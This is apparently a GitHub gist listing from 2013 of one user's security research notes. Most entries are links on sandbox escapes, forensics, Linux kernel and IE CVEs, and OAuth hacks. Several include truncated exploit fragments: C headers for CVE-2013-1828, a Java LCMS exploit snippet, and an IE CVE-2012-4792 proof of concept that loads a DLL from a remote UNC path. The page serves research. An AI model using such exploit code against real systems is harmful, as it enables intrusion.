Skip to content

Instantly share code, notes, and snippets.

View hellok's full-sized avatar

Chen Qin hellok

103 followers · 120 following
View GitHub Profile
@hellok
hellok / gist:5097616
Created March 6, 2013 08:24
pwn python
pwnpython.sinaapp.com
http://www.doc88.com/p-776872822117.html
https://github.com/ichuan/djblog django on sae
https://github.com/SAEPython/saepythondevguide
https://gist.github.com/nkchenz/1400023 good!
OLD:
isisblogs.poly.edu/2012/10/26/escaping-python-sandboxes/
@hellok
hellok / gist:5132996
Last active December 14, 2015 18:59
forensics online
http://forensic-proof.com/archives/category/fundamentals
http://computer-forensics.sans.org/training/course/windows-memory-forensics-in-depth
http://forensicinsight.org/
http://forensicinsight.org/tools
时间轴整合分析(综合时间轴分析):
http://forensic-proof.com/archives/2323
时间信息表示(时间则表达式):
http://forensic-proof.com/archives/617
@hellok
hellok / gist:5149174
Created March 13, 2013 03:28
volatility
https://code.google.com/p/volatility/
http://volatility-labs.blogspot.com/2013/01/the-1st-annual-volatility-framework.html
http://volatility.googlecode.com/svn/trunk/
All submissions should be received no later than August 1, 2013
@hellok
hellok / gist:5158695
Created March 14, 2013 03:54
CVE-2013-1828 Linux Kernel SCTP_GET_ASSOC_STATS() Buffer Overflow
Linux Kernel SCTP_GET_ASSOC_STATS() Buffer Overflow
http://packetstormsecurity.com/files/120789/sctpgetassoc-local.txt
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132
@hellok
hellok / gist:5158885
Created March 14, 2013 04:47
ms13_009 ie_slayoutrun_uaf
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@hellok
hellok / gist:5158940
Created March 14, 2013 05:00
CVE-2013-1763 SOCK_DIAG vulnerability in Linux kernel 3.3 to 3.8 Demo local root
http://pastebin.com/gwn1qErx
poc:http://sysc.tl/mpougatsa_me_krema_kai_milko.tgz
@hellok
hellok / gist:5158954
Created March 14, 2013 05:04
java 1day analyze
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-0809
http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/fa09ada25c47
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-1493
http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/4f97a6256473
////////////////////////////////////////////////////////////
http://icedtea.classpath.org/hg/release/icedtea6-1.12/file/2e114710f951/patches/security
2.1 --- a/NEWS Tue Feb 19 16:15:47 2013 -0500
2.2 +++ b/NEWS Wed Feb 20 11:41:10 2013 +1100
2.3 @@ -13,8 +13,8 @@
@hellok
hellok / gist:5160016
Created March 14, 2013 09:22
public void try1() throws Throwable
{
LCMSTransform trans;
BufferedImage image=new BufferedImage(255, 255, 1);
LCMS sda=new LCMS();
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = sda;
arrayOfObject[1] = image;
Expression localExpression = new Expression(GetClass("sun.java2d.cmm.lcms"), "LCMSImageLayout", arrayOfObject);
localExpression.execute();
@hellok
hellok / gist:5184559
Created March 18, 2013 02:21
SNS XSS OAuth
http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html
http://www.nirgoldshlager.com/2013/03/how-i-hacked-any-facebook-accountagain.html
OAuth
http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/
@hellok
hellok / gist:5185526
Created March 18, 2013 07:12
CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"
//http://pastebin.com/Y95c831m
<!doctype html>
<html>
<head>
<script>
// CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
// Effective in 32-bit IE on x64 Windows
// Will load \\192.168.59.128\x\x.dll
// https://twitter.com/tombkeeper
function GIFT() {